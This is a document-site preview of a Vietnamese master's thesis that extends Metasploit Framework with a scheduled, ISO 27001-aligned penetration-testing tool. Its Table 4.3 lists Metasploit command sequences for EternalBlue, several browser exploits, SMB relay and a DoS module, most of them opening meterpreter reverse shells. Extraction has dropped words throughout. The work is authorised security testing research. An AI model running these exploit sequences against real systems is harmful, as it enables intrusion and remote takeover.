Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống
1
/ 71 trang
THÔNG TIN TÀI LIỆU
Thông tin cơ bản
Định dạng
Số trang
71
Dung lượng
2,58 MB
Nội dung
ĐẠI HỌC QUỐC GIA HÀ NỘI TRƯỜNG ĐẠI HỌC CÔNG NGHỆ LÃ XUÂN KIÊN NÂNG CẤP ỨNG DỤNG KHAI THÁC CÁC LỖ HỔNG AN NINH METASPLOIT FRAMEWORK LUẬN VĂN THẠC SĨ CÔNG NGHỆ THÔNG TIN Hà Nội – 2020 ĐẠI HỌC QUỐC GIA HÀ NỘI TRƯỜNG ĐẠI HỌC CÔNG NGHỆ LÃ XUÂN KIÊN NÂNG CẤP ỨNG DỤNG KHAI THÁC CÁC LỖ HỔNG AN NINH METASPLOIT FRAMEWORK Ngành: Công nghệ Thơng tin Chun ngành: An tồn Thơng tin Mã số: 8480202.01 LUẬN VĂN THẠC SĨ CÔNG NGHỆ THÔNG TIN NGƯỜI HƯỚNG DẪN KHOA HỌC: TS NGUYỄN ĐẠI THỌ Hà Nội – 2020 MỤC LỤC LỜI CẢM ƠN LỜI CAM ĐOAN DANH MỤC HÌNH VẼ, ĐỒ THỊ DANH MỤC BẢNG BIỂU DANH MỤC CÁC KÝ HIỆU VÀ CHỮ VIẾT TẮT MỞ ĐẦU Chương TỔNG QUAN VỀ KIỂM ĐỊNH AN TỒN THƠNG TIN 11 1.1 Bối cảnh 11 1.2 Giới thiệu toán 12 Chương TỔNG QUAN VỀ METASPLOIT 13 2.1 Khái niệm 13 2.2 Các phiên Metasploit 13 2.2.1 Metasploit Community Edition 13 2.2.2 Metasploit Framework Edition 14 2.2.3 Metasploit Pro 15 2.3 Kiến trúc Metasploit 17 2.3.1 Thư viện 17 2.3.2 Giao diện 17 2.3.3 Mô đun chức 19 2.3.4 Thành phần mở rộng 19 Chương HỆ THỐNG CÁC TIÊU CHUẨN VỀ AN TỒN THƠNG TIN 20 3.1 Các tiêu chuẩn quản lý an toàn thông tin 21 3.2 Họ tiêu chuẩn ISMS 23 3.3 Chuẩn ISO 27001 24 3.4 Chi tiết phụ lục chuẩn ISO 27001 25 Chương XÂY DỰNG CÔNG CỤ LẬP LỊCH QUÉT TỰ ĐỘNG VÀ TUÂN THỦ TIÊU CHUẨN CHO METASPLOIT FRAMEWORK 40 4.1 Tính Automatic Task Chain Metasploit Pro 40 4.2 Phân tích yêu cầu 44 4.3 Lập danh sách mã khai thác 45 4.4 Thiết kế kịch kiểm thử 50 4.5 Cấu trúc Compliance Chain 50 4.5.1 Biểu đồ lớp 51 4.5.2 Danh sách chức 52 4.5.3 Các thao tác nạp kịch kiểm thử 52 KẾT LUẬN 69 TÀI LIỆU THAM KHẢO 71 LỜI CẢM ƠN Trước tiên xin dành lời cảm ơn chân thành sâu sắc đến Thầy giáo, TS Nguyễn Đại Thọ – người tận tình hướng dẫn, khuyến khích, bảo, tạo cho điều kiện tốt từ bắt đầu hồn thành cơng việc làm luận văn Tơi xin gửi lời cảm ơn chân thành tới Thầy giáo, Cô giáo giảng dạy mơn An tồn Thơng tin, khoa Cơng nghệ Thông tin, Đại học Công nghệ - ĐHQGHN tận tình đào tạo, cung cấp cho tơi kiến thức vô quý giá tạo điều kiện tốt cho tơi suốt q trình học tập, nghiên cứu trường Đồng thời xin cảm ơn tất người thân u gia đình tồn thể bạn bè, đồng nghiệp người giúp đỡ, động viên tơi vấp phải khó khăn, bế tắc sống công việc Mặc dù cố gắng luận văn chắn khơng tránh khỏi thiếu sót, tơi mong nhận ý kiến đánh giá phê bình từ phía Thầy giáo, Cơ giáo để luận văn hồn thiện Tơi xin chân thành cảm ơn! LỜI CAM ĐOAN Tôi xin cam đoan luận văn Thạc sĩ Công nghệ Thông tin với đề tài “Nâng cấp ứng dụng khai thác lỗ hổng an ninh Metasploit Framework” cơng trình nghiên cứu riêng hướng dẫn TS Nguyễn Đại Thọ, khơng chép lại người khác Trong tồn nội dung luận văn, điều trình bày hồn tồn trung thực, cá nhân tơi tìm hiểu, tổng hợp từ nhiều nguồn tài liệu chưa công bố đồ án, luận văn, luận án trường Đại học Công nghệ - ĐHQGHN trường đại học khác Tất nguồn tài liệu tham khảo có xuất xứ rõ ràng hợp pháp Nếu có phát gian lận, chép tài liệu, cơng trình nghiên cứu tác giả khác mà không ghi rõ phần tài liệu tham khảo, tơi xin hồn tồn chịu trách nhiệm chịu hình thức kỷ luật theo quy định cho lời cam đoan Hà Nội, ngày 12 tháng 12 năm 2020 Học viên Lã Xuân Kiên DANH MỤC HÌNH VẼ, ĐỒ THỊ Hình 2.1 Metasploit Community Edition 14 Hình 2.2 Giao diện Metasploit Framework 14 Hình 2.3 Metasploit Pro 15 Hình 2.4 So sánh phiên Metasploit Pro Framework 16 Hình 2.5 Kiến trúc Metasploit 17 Hình 2.6 Giao diện Console 18 Hình 2.7 Giao diện CLI 18 Hình 2.8 Giao diện Web-GUI 19 Hình 3.1 Hệ thống quy chuẩn an tồn thơng tin 21 Hình 3.2 Họ tiêu chuẩn ISMS 23 Hình 3.3 Danh sách yêu cầu cần kiểm soát 24 Hình 4.1 Danh sách Task Chains 40 Hình 4.2 Danh sách Module Task Chain 41 Hình 4.3 Danh sách thao tác Module 41 Hình 4.4 Danh sách thao tác Module Task Chain 42 Hình 4.5 Lập lịch tự động chạy Chain 43 Hình 4.6 Lập lịch tự động chạy Chain 44 Hình 4.7 Biểu đồ lớp Compliance Chain 51 Hình 4.8 Danh sách chức Compilance Chain 52 Hình 4.9 Hướng dẫn thao tác Compliance Chain 53 Hình 4.10 Nạp kịch vào cơng cụ Compliance Chains 68 DANH MỤC BẢNG BIỂU Bảng 4.1 Danh sách mã khai thác 49 Bảng 4.2 Danh sách Chains 50 Bảng 4.3 Mô tả kịch 67 DANH MỤC CÁC KÝ HIỆU VÀ CHỮ VIẾT TẮT Ký hiệu Thuật ngữ Ý nghĩa API Application Programming Interface Giao diện lập trình ứng dụng CLI Command Line Interface Giao diện dịng lệnh GUI Graphical User Interface Giao diện đồ họa người dùng HTTPS Hypertext Transfer Protocol Secure Mã hóa giao thức truyền tải siêu văn HTTP HyperText Transfer Protocol Giao thức truyền tải siêu văn IoT Internet of Things Internet vạn vật ISO International Organization for Tổ chức tiêu chuẩn hóa Quốc tế Standardization IEC International Electrotechnical Ủy ban Kỹ thuật điện Quốc tế Commission ISMS Information Security Magagement Hệ thống quản lý an tồn thơng tin System MSF Metasploit Framework SSL Secure Sockets Layer Mã hóa lớp Sockets SMB Server Message Block XML eXtensible Markup Language Ngôn ngữ đánh dấu mở rộng MỞ ĐẦU Ngày nay, an ninh thông tin đã, vào ngõ ngách đời sống xã hội dần trở thành phận quan trọng an ninh quốc gia Nguy gây an ninh thông tin mối đe dọa lớn ngày gia tăng an ninh quốc gia Lĩnh vực viễn thông, Internet, tần số vơ tuyến điện có phát triển mạnh mẽ, đạt mục tiêu số hóa hồn tồn mạng lưới, phát triển nhiều dịch vụ mới, phạm vi phục vụ mở rộng, bước đầu hình thành doanh nghiệp mạnh, có khả vươn tầm khu vực, quốc tế Hệ thống bưu chuyển phát, báo chí, xuất phát triển nhanh số lượng, chất lượng kỹ thuật nghiệp vụ, có đóng góp quan trọng cho phát triển kinh tế - xã hội; đảm bảo quốc phịng, an ninh, đối ngoại đất nước Tình hình an ninh thơng tin Việt Nam có diễn biến phức tạp Các quan đặc biệt nước ngoài, lực thù địch, phản động tăng cường hoạt động tình báo, gián điệp, khủng bố, phá hoại hệ thống thông tin; tán phát thông tin xấu, độc hại nhằm tác động tới trị nội bộ, can thiệp, hướng lái sách, pháp luật Việt Nam Gia tăng hoạt động công mạng nhằm vào hệ thống thông tin quan trọng an ninh quốc gia Theo thống kê, trung bình năm, qua kiểm tra, kiểm soát quan chức phát 850.000 tài liệu chiến tranh tâm lý, phản động, ân xá quốc tế, tài liệu tuyên truyền tà đạo trái phép; gần 750.000 tài liệu tuyên truyền chống Đảng, Nhà nước phát tán vào Việt Nam qua đường bưu Từ 2010 đến 2019 có 53.744 lượt cổng thơng tin, trang tin điện tử có tên miền bị cơng, có 2.393 lượt cổng thông tin, trang tin điện tử quan Đảng, Nhà nước tên miền gov.vn, xuất nhiều cơng mang màu sắc trị, gây hậu nghiêm trọng Tội phạm vi phạm pháp luật lĩnh vực thông tin diễn biến phức tạp, gia tăng số vụ, thủ đoạn tinh vi, gây thiệt hại nghiêm trọng nhiều mặt Các hành vi phá hoại sở hạ tầng thơng tin, gây an tồn, hoạt động bình thường, vững mạnh mạng máy tính, mạng viễn thơng, phương tiện điện tử quan, tổ chức, cá nhân, hệ thống thông tin vô tuyến điện, … gây thiệt hại lớn kinh tế, xâm hại trực tiếp đến quyền, lợi ích hợp pháp quan, tổ chức cá nhân Thực tế nêu làm xuất nhiều nguy đe dọa đến an ninh thông tin Việt Nam bên bên Ở nước, trước hết nguy tụt hậu công nghệ, lệ thuộc vào cơng nghệ nước ngồi, hệ thống mạng lõi; phần mềm hệ thống, dịch vụ thơng tin nước ngồi (nhất dịch vụ mạng xã hội) dẫn tới chủ quyền nội dung số, tài nguyên thông tin công ty công nghệ nước ngày nghiêm trọng hơn; đối tượng hội, chống đối trị nước, triệt để sử dụng mạng xã hội tán phát thông tin giả, thông tin xấu, độc nhằm gây rối nội bộ, kích động biểu tình, bạo loạn 10 Hệ thống thơng tin Việt Nam cịn tồn nhiều điểm yếu, lỗ hổng bảo mật dễ bị khai thác, cơng, xâm nhập, tình trạng lộ, bí mật nhà nước qua hệ thống thông tin gia tăng đột biến, tượng khai thác, sử dụng trái phép sở liệu, tài nguyên thông tin quốc gia, liệu cá nhân người dùng diễn biến phức tạp, xuất nhiều dịch vụ mới, đại gây khó khăn cho cơng tác quản lý, kiểm sốt quan chức Hiện nay, đất nước ta đứng trước nguy cơ, thách thức lớn từ Cách mạng công nghiệp lần thứ với phát triển, ứng dụng mạnh mẽ trí tuệ nhân tạo, rơ-bốt, cơng nghệ sinh học, hình thành nên nhiều lĩnh vực như: “Internet công nghiệp”, “Nhà máy thông minh”, “Thành phố thơng minh”, “Xã hội siêu thơng minh”, “Chính phủ điện tử”, … hoạt động môi trường không gian mạng, tạo đột phá phát triển kinh tế, trị - xã hội Xu hướng Internet kết nối vạn vật (IoT), gồm Internet kết nối với lượng, dịch vụ, truyền thông đa phương tiện, người, vạn vật thay đổi phương thức hoạt động kinh tế, thói quen, tâm lý, văn hóa xã hội Sự phát triển kinh tế xã hội đảm bảo an ninh quốc gia Việt Nam năm tới chủ yếu dựa tảng kỹ thuật số Với xu phát triển kinh tế chia sẻ, chuyển đổi số, … công nghiệp công nghệ thông tin trở thành ngành kinh tế chủ đạo, định phát triển nhanh, bền vững quốc gia Vậy để thông tin bảo vệ, hạn chế công, vừa giúp cho doanh nghiệp, tổ chức có hình ảnh uy tín bên đối tác đánh giá tin tưởng hợp tác với doanh nghiệp có bảo vệ thơng tin cách an tồn vấn đề an tồn thơng tin lại quan trọng, nhu cầu cấp thiết doanh nghiệp, tổ chức Vậy làm để giúp doanh nghiệp, tổ chức thực điều đó? Để trả lời cho câu hỏi này, luận văn “Nâng cấp ứng dụng khai thác lỗ hổng an ninh Metasploit Framework” nghiên cứu tìm hiểu cách xây dựng cơng cụ lập lịch tự động dò quét để kiểm thử an ninh hệ thống (Penetration Testing) sử dụng công cụ miễn phí nguồn mở Metasploit Framework theo yêu cầu tiêu chuẩn an tồn thơng tin ISO 27001 giúp cho doanh nghiệp quản lý, bảo vệ thơng tin cách an toàn hiệu Luận văn tơi chia làm chương: Chương 1: Trình bày tổng quan kiểm định an tồn thơng tin Chương 2: Trình bày tổng quan Metasploit Chương 3: Trình bày hệ thống tiêu chuẩn an tồn thơng tin Chương 4: Xây dựng cơng cụ lập lịch dị quét tự động cho Metasploit Framework 57 Cập nhật lịch cụ thể hơn, chỉnh 8h30 58 Bước 6: Quản lý Steps: Bước 6.1: Tạo Step: step Tạo liên tiếp Step với tên st1 s2 33333 59 Bước 6.2: Di chuyển Step kiểm tra Step: step prev/next Bước 6.3: Cập nhật vị trí file rc có sẵn: step rc_path 60 Bước 6.4: Sửa file rc: step rc File rc tạo với nội dung động theo Params, Param thừa kế ghi đè theo thứ tự từ Profile Params, Chain Params, Step Params Sinh file thực thi step st1.rc 61 Nội dung step 2.rc Bước 7: Lưu lại thay đổi (thủ cơng) vào file cấu hình config.json File config chuyển sang máy khác để dùng cấu hình chia sẻ Bước 8: Cài đặt/gỡ cc_install/cc_uninstall cài đặt Profile enable vào Crontab: 62 cc_uninstall để gỡ tất Profile Crontab khác Chain bảo toàn Bước 9: Crontab job chạy tương tự sau 63 Sau cài đặt bước chuẩn ISO 27001 vào thành Profile iso271, có Chain trình bày bảng mục 4.4, Chain có Step Exploit mơ tả sau: 64 Mô tả kịch bản: Tham Mã chiếu Exploit A.9 MS14-002 Module Msf exploit/windows/local/ms_ndproxy A.9 MS13-059 exploit/windows/browser/ms13_059_cflatmarku ppointer A.9 MS02-063 auxiliary/dos/pptp/ms02_063_pptp_dos A.8 MS13-022 exploit/windows/browser/ms13_022_silverlight_ script_object Mã lệnh kịch use exploit/windows/local/ms_ndproxy set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use exploit/windows/browser/ms13_059_cflatmarkuppointer set SRVHOST set SRVPORT 8080 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use auxiliary/dos/pptp/ms02_063_pptp_dos set RHOSTS set RPORT 1723 run use exploit/windows/browser/ms13_022_silverlight_script_o bject 65 A.8 MS11-081 exploit/windows/browser/ms11_081_option A.8 MS07-029 exploit/windows/smb/ms07_029_msdns_zonena me A.8 MS08-068 exploit/windows/smb/smb_relay set SRVHOST set SRVPORT 8080 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use exploit/windows/browser/ms11_081_option set SRVHOST set SRVPORT 8080 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use exploit/windows/smb/ms07_029_msdns_zonename set RHOSTS set RPORT 445 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use exploit/windows/smb/smb_relay set RHOSTS 66 A.12 MS17-010 exploit/windows/smb/ms17_010_eternalblue A.12 Google exploit/multi/browser/chrome_object_create Chrome 67, 68 and 69 Object.crea te exploit A.12, A.9 MS15-001 exploit/windows/local/ntapphelpcachecontrol set RPORT 445 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use exploit/windows/smb/ms17_010_eternalblue set RHOSTS set RPORT 445 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use exploit/multi/browser/chrome_object_create set SRVHOST set SRVPORT 8080 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use exploit/windows/local/ntapphelpcachecontrol set LHOST set LPORT 4444 67 A.12 MS14-012 A.12 MS10-002 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit exploit/windows/browser/ms14_012_cmarkup_u use exploit/windows/browser/ms14_012_cmarkup_uaf af set SRVHOST set SRVPORT 8080 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit exploit/windows/browser/ms10_002_aurora use exploit/windows/browser/ms10_002_aurora set SRVHOST set SRVPORT 8080 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit Bảng 4.3 Mô tả kịch 68 Kết sau đưa vào công cụ hiển thị sau: Hình 4.10 Nạp kịch vào cơng cụ Compliance Chains 69 KẾT LUẬN Đánh giá so sánh chức phát triển với thương mại công cụ khác Với Metasploit Pro: Điểm mạnh phiên Metasploit Pro so với Framework mã nguồn mở chức tự động hóa Trong phát triển Metasploit, phiên Pro tăng cường khả vận hành, quản lý thông qua giao diện, phát triển chức trực tiếp mã nguồn Ruby phát triển sẵn thủ tục tự động hóa thao tác Framework (như task chain, smart intelligence, smart exploit, …) Công cụ Compliance Chain thiết kế tái tạo lại gần đủ luồng chức chức Task Chain Pro Do hạn chế quyền phát triển thời lượng đề tài, nhiều chức nâng cao tích hợp Step với cơng cụ bên thứ 3, tích hợp chức khác Pro vào Task Chain chưa thể thực Các chức tạo lập chain, lập lịch, định nghĩa hành động thử nghiệm tương tự phiên Pro Nhờ có đời Compliance Chain Framework với sở cơng cụ tự động hóa thao tác có sẵn Msf, chức nâng cao thao tác với Framework bruteforce, smart exploit, auto scan, … phát triển dễ dàng đem đến cho cộng đồng Msf khả tương tự pro Với công cụ hỗ trợ GUI: Công cụ hỗ trợ Framework Armitage cung cấp giao diện số thao tác sẵn có dựa lệnh Msf chức giống với Compliance Chain thiết kế tự động khai thác dựa dấu vết (Footprint) hệ điều hành máy đối tượng thu thập chức “Hell mode” (chế độ địa ngục) thực thi toàn Exploit biết sở liệu kịch Armitage Với chế độ tự động khai thác, Armitage đưa khai thác dựa dấu vết thu thập Thực mục tiêu kiểm định yêu cầu chuẩn an tồn thơng tin, ta cần thực nhiều Exploit có liên quan không phát thấy dấu hiệu có khả khai thác từ dấu vết Bởi không đảm bảo mục tiêu kiểm thử thông qua Exploit liên thuộc vủa chế độ tự động khai thác mà không đảm bảo vượt qua tiêu chí chuẩn Ngược lại chức “Hell mode” lại thực thi toàn Exploit biết, điều nguy hiểm với hệ thống thực tế Thực vậy, thông báo nhắc nhở mối nguy hiểm thực thi chế độ hell mode lên trước lần người dùng định có thực thực thi tồn hay khơng để tránh rủi ro gây sập, phá vỡ hệ thống “Hell mode” vượt nhu cầu kiểm thử, gây tiêu tốn tài nguyên để sót lại nhiều mã độc hệ thống kiểm thử Có thể thấy với phạm vi kiểm thử theo yêu cầu chuẩn, phù hợp với mục tiêu kinh doanh yêu cầu thực tế, công cụ Compliance Chains thực đúng, đủ, tốt đặt gây tổn hại tới hệ thống kiểm định 70 Kết đạt Sau thời gian tìm hiểu, nghiên cứu tài liệu làm luận văn hướng dẫn thầy TS Nguyễn Đại Thọ tơi hồn thành luận văn với đề tài “Nâng cấp ứng dụng khai thác lỗ hổng an ninh Metasploit Framework” Luận văn đạt kết sau: - Tìm hiểu công cụ công kiểm thử mã nguồn mở Metasploit, kiến trúc, cách thức hoạt động - Tìm hiểu hệ thống quy chuẩn an tồn thơng tin tiêu chuẩn ISO 27001 - Tìm hiểu, phân tích yêu cầu hệ thống dựa chuẩn ISO 27001, lập danh sách mã khai thác thực lên lịch quét tự động theo chuẩn ISO 27001 - Xây dựng quy trình phân tích, chuyển đổi yêu cầu an ninh chuẩn thành thực thi cụ thể thông qua công cụ Msf để kiểm định lỗ hổng đặc điểm không tuân thủ chuẩn hệ thống - Xây dựng thành công công cụ triển khai thiết kế kịch lên lịch chạy định kỳ kịch kiểm định Compliance Chains Hạn chế: Công cụ xây dựng tham chiếu đến nhóm Exploit yêu cầu dạng kỹ thuật Các yêu cầu khác liên quan tới quản trị quản lý người cơng cụ chưa đáp ứng số hố hồn tồn Cụ thể với chuẩn ISO 27001, công cụ đáp ứng mục yêu cầu A.8, A.9 A.12 chuẩn ISO 27001 mà không tham chiếu hết 14 yêu cầu chuẩn Định hướng phát triển: Từ kết nghiên cứu thu được, đề tài mở rộng phát triển theo hướng sau: - Phát triển thêm theo u cầu nhiều chuẩn an tồn thơng tin thuộc lĩnh vực chuyên ngành khác, mở rộng thêm danh sách Exploit đáp ứng đầy đủ yêu cầu chuẩn - Nghiên cứu phát triển hệ thống phân tích kết dò quét hệ thống, gợi ý vá lỗ hổng theo kết thu thập 71 TÀI LIỆU THAM KHẢO Tiếng Anh Mike Chapple., David Seildl (2019), Pentest+ Study Guide, CompTIA David Maynor., K K Mookhey., Jacopo Cervini., Fairuzan Roslan., Kevin Beaver (2007), Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research Website Metasploit Project Retrieved from https://en.wikipedia.org/wiki/Metasploit_Project Introduction to metasploit framework Retrieved from https://www.slideshare.net/MostafaAbdelsallam/01-metasploit-kung-fuintroduction Metasploit Community Edition Retrieved from https://www.offensivesecurity.com/metasploit-unleashed/msf-community-edition/ Metasploit Pen Testing Tool Retrieved from https://www.rapid7.com/products/metasploit/download/editions/ What is Metasploit? The Beginner’s Guide Retrieved from https://www.varonis.com/blog/what-is-metasploit/ Vulnerability & Exploit Database Retrieved from https://www.rapid7.com/db/?q=&type=metasploit The Requirements & Annex A Controls of ISO 27001 Retrieved from https://www.isms.online/iso-27001/requirements-controls/ ISO 27001: The 14 control sets of Annex A explained Retrieved from https://www.itgovernance.co.uk/blog/iso-27001-the-14-control-sets-of-annex-aexplained ISO 27001 Compliance Checklist Retrieved from https://idoc.pub/download/iso-27001-compliance-checklist-d2nv3oomx04k 10 Mapping to ISO 27001 Controls Retrieved from http://www.esdebe.com/perch/resources/iso-27001-annex-s-controlmapping.pdf 11 An ninh thông tin Việt Nam điều kiện Retrieved from http://tuyengiao.vn/ 12 Quá trình hình thành tiêu chuẩn an tồn thơng tin Retrieved from http://antoanthongtin.gov.vn/ 13 Mô tả chức Task Chain Retrieved from https://docs.rapid7.com/metasploit/task-chains/ 14 Rubydoc of Metasploit Framework project Retrieved from https://www.rubydoc.info/github/rapid7/metasploit-framework